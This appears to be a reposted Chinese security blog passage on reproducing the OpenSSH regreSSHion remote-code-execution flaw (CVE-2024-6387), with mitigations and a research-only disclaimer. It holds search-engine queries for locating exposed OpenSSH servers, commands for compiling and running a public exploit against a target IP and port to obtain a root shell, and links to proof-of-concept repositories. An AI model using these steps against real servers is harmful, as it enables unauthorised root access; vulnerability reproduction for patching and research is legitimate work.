Fofa:protocol="ssh"
quake:app:"OpenSSH"
hunter:app.name="OpenSSH"
0x03 漏洞复现
使用gcc编译源码,该漏洞攻击时间过长,在本地虚拟机环境“平均需要尝试约10,000次才能成功,约需3-4小时,每次实验成功率只有一半,因此平均需要6-8小时才能获得远程root shell
gcc -o exploit 7etsuo-regreSSHion.c
./exploit <ip> <port>
例如:
./exploit 192.168.31.19 22
2、关注官方发布的补丁。
3、设置白名单访问。
github poc地址,如不想自己编译也可以关注公众号回复【20240702】获取编译好的poc。
https://github.com/zgzhang/cve-2024-6387-poc
https://github.com/acrono/cve-2024-6387-poc
https://github.com/lflare/cve-2024-6387-poc
原文始发于微信公众号(网安鲲为帝):【漏洞复现】OpenSSH RCE (CVE-2024-6387) | 附poc
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论